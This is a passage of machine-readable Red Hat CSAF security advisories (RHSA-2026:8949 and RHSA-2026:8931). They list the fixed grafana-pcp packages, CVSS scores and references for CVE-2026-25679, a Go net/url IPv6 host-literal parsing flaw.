"AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.src", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.x86_64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T11:16:56+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.src", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.x86_64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:8949"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.src", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.x86_64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.src", "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.x86_64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "AppStream-9.0.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:8949"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana-pcp is now available for Red Hat Enterprise Linux 10.0 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:8931", "url": "https://access.redhat.com/errata/RHSA-2026:8931"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8931.json"}], "title": "Red Hat Security Advisory: grafana-pcp security update", "tracking": {"current_release_date": "2026-06-08T15:52:48+00:00", "generator": {"date": "2026-06-08T15:52:48+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:8931", "initial_release_date": "2026-04-20T09:31:25+00:00", "revision_history": [{"date": "2026-04-20T09:31:25+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T09:31:25+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:48+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S", "product_identification_helper": {"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.2.2-5.el10_0.src", "product": {"name": "grafana-pcp-0:5.2.2-5.el10_0.src", "product_id": "grafana-pcp-0:5.2.2-5.el10_0.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.2.2-5.el10_0?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.2.2-5.el10_0.aarch64", "product": {"name": "grafana-pcp-0:5.2.2-5.el10_0.aarch64", "product_id": "grafana-pcp-0:5.2.2-5.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.2.2-5.el10_0?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "product": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "product_id": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.2.2-5.el10_0?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "product": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "product_id": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.2.2-5.el10_0?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "product": {"name": "grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "product_id": "grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.2.2-5.el10_0?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "product": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "product_id": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.2.2-5.el10_0?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "product": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "product_id": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.2.2-5.el10_0?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.2.2-5.el10_0.s390x", "product": {"name": "grafana-pcp-0:5.2.2-5.el10_0.s390x", "product_id": "grafana-pcp-0:5.2.2-5.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.2.2-5.el10_0?arch=s390x"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "product": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "product_id": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.2.2-5.el10_0?arch=s390x"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "product": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "product_id": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.2.2-5.el10_0?arch=s390x"}}}], "category": "architecture", "name": "s390x"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:5.2.2-5.el10_0.x86_64", "product": {"name": "grafana-pcp-0:5.2.2-5.el10_0.x86_64", "product_id": "grafana-pcp-0:5.2.2-5.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@5.2.2-5.el10_0?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64", "product": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64", "product_id": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debugsource@5.2.2-5.el10_0?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "product": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "product_id": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@5.2.2-5.el10_0?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.2.2-5.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.aarch64"}, "product_reference": "grafana-pcp-0:5.2.2-5.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.2.2-5.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.ppc64le"}, "product_reference": "grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.2.2-5.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.s390x"}, "product_reference": "grafana-pcp-0:5.2.2-5.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.2.2-5.el10_0.src as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.src"}, "product_reference": "grafana-pcp-0:5.2.2-5.el10_0.src", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:5.2.2-5.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.x86_64"}, "product_reference": "grafana-pcp-0:5.2.2-5.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64"}, "product_reference": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le"}, "product_reference": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x"}, "product_reference": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64"}, "product_reference": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le"}, "product_reference": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x"}, "product_reference": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64"}, "product_reference": "grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.src", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T09:31:25+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.src", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:8931"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.src", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.src", "AppStream-10.0.Z.E2S:grafana-pcp-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debuginfo-0:5.2.2-5.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-pcp-debugsource-0:5.2.2-5.el10_0.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:8931"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common 